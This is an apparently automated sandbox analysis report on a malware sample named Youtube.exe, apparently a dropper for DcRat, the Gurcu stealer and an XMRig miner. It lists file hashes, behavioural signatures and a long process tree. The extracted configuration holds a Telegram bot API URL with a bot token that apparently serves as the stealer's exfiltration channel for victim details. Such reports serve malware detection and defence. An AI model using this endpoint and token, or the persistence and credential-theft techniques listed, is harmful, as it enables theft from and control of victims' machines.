Analysis

  • max time kernel
    619s
  • max time network
    621s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-07-2024 13:31

Errors

Reason
Machine shutdown

General

  • Target

    Youtube.exe

  • Size

    8.7MB

  • MD5

    d25ebdfc04bdadea74017fa72f90781f

  • SHA1

    f7278c4d04fc4db888368e0245d7607d8bcbb557

  • SHA256

    9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f

  • SHA512

    77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

  • SSDEEP

    196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20e56e816ffb40bc7f33bf5cbd014b2bf08f4caf6c%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20NFBRAUUT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CWindows%5CMigration%5CSolaraBootstrapper.ex

Signatures

  • DcRat 52 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 17 IoCs
  • Process spawned unexpected child process 51 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • DCRat payload 6 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 35 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 56 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 34 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 52 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 25 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
    "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Users\Admin\AppData\Local\Temp\Result.exe
      "C:\Users\Admin\AppData\Local\Temp\Result.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1540
        • C:\Windows\SysWOW64\msiexec.exe
          "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:6052
        • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
          "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
          4⤵
          • Executes dropped EXE
          PID:4280
          • C:\Windows\Temp\{FA910571-3A28-4E19-83D6-6A791BAB7423}\.cr\vc_redist.x64.exe
            "C:\Windows\Temp\{FA910571-3A28-4E19-83D6-6A791BAB7423}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=684 -burn.filehandle.self=692 /install /quiet /norestart
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:5676
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
          4⤵
          • Enumerates system info in registry
          • Modifies registry class
          • NTFS ADS
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4568
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc0cdc3cb8,0x7ffc0cdc3cc8,0x7ffc0cdc3cd8
            5⤵
              PID:804
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
              5⤵
                PID:1860
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 /prefetch:3
                5⤵
                  PID:176
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8
                  5⤵
                    PID:5272
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                    5⤵
                      PID:1984
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                      5⤵
                        PID:5836
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5112 /prefetch:8
                        5⤵
                          PID:5780
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
                          5⤵
                            PID:3088
                          • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
                            5⤵
                              PID:5496
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                              5⤵
                                PID:744
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3344 /prefetch:8
                                5⤵
                                • NTFS ADS
                                PID:5360
                              • C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe
                                "C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe"
                                5⤵
                                • Executes dropped EXE
                                • Modifies registry class
                                • NTFS ADS
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:3356
                                • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe
                                  "C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe" --app -channel production
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of UnmapMainImage
                                  PID:9952
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5920 /prefetch:2
                                5⤵
                                  PID:400
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                                  5⤵
                                    PID:13776
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
                                    5⤵
                                      PID:16636
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
                                      5⤵
                                        PID:16724
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
                                        5⤵
                                          PID:16732
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
                                          5⤵
                                            PID:12164
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
                                            5⤵
                                              PID:17672
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3568 /prefetch:8
                                              5⤵
                                                PID:12368
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3536 /prefetch:8
                                                5⤵
                                                  PID:17940
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1732 /prefetch:1
                                                  5⤵
                                                    PID:18288
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
                                                    5⤵
                                                      PID:18500
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
                                                      5⤵
                                                        PID:19140
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
                                                        5⤵
                                                          PID:19284
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
                                                          5⤵
                                                            PID:15528
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6532 /prefetch:8
                                                            5⤵
                                                              PID:15636
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1812 /prefetch:1
                                                              5⤵
                                                                PID:7740
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
                                                                5⤵
                                                                  PID:12544
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,145783463429362339,13410674023234053698,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
                                                                  5⤵
                                                                    PID:14136
                                                                  • C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe
                                                                    "C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe" roblox-player:1+launchmode:play+gameinfo:TAb7PAGJ8OynXeZirrpq3QO8VYK6tq7iJxhCZ9NQ0oib8178jjdpG9EfO_S1zTD7SSJPJZscidkmil8yg4aX_Ogr3pgmWEzO_8hZL9MypeIUXqt9Yie99u_yg3bi0UgLuYh4kNbrz29nHFC-2-edHR_611QVzds7TuRR7KvZOjn-SFX8fYapkhKmt31KFPupabziDFfkShwiSkOxw8RXCZ39txDuiJ4THJ6SqlrC_QI+launchtime:1721223661328+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1721223524753009%26placeId%3D189707%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D917eb536-95ba-4b18-b2fb-f81e4d8a21cf%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1721223524753009+robloxLocale:en_us+gameLocale:en_us+channel:zflexlayouttest2+LaunchExp:InApp
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:6304
                                                                    • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe
                                                                      "C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:TAb7PAGJ8OynXeZirrpq3QO8VYK6tq7iJxhCZ9NQ0oib8178jjdpG9EfO_S1zTD7SSJPJZscidkmil8yg4aX_Ogr3pgmWEzO_8hZL9MypeIUXqt9Yie99u_yg3bi0UgLuYh4kNbrz29nHFC-2-edHR_611QVzds7TuRR7KvZOjn-SFX8fYapkhKmt31KFPupabziDFfkShwiSkOxw8RXCZ39txDuiJ4THJ6SqlrC_QI+launchtime:1721223667457+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1721223524753009%26placeId%3D189707%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D917eb536-95ba-4b18-b2fb-f81e4d8a21cf%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1721223524753009+robloxLocale:en_us+gameLocale:en_us+LaunchExp:InApp+channel:production
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious use of UnmapMainImage
                                                                      PID:6544
                                                                • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
                                                                  4⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Modifies registry class
                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:2036
                                                                  • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=2036.5220.16564172339245413398
                                                                    5⤵
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:676
                                                                    • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7ffc0cdc3cb8,0x7ffc0cdc3cc8,0x7ffc0cdc3cd8
                                                                      6⤵
                                                                        PID:392
                                                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1936,6316512354242989296,15655194885661780291,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2
                                                                        6⤵
                                                                          PID:5864
                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
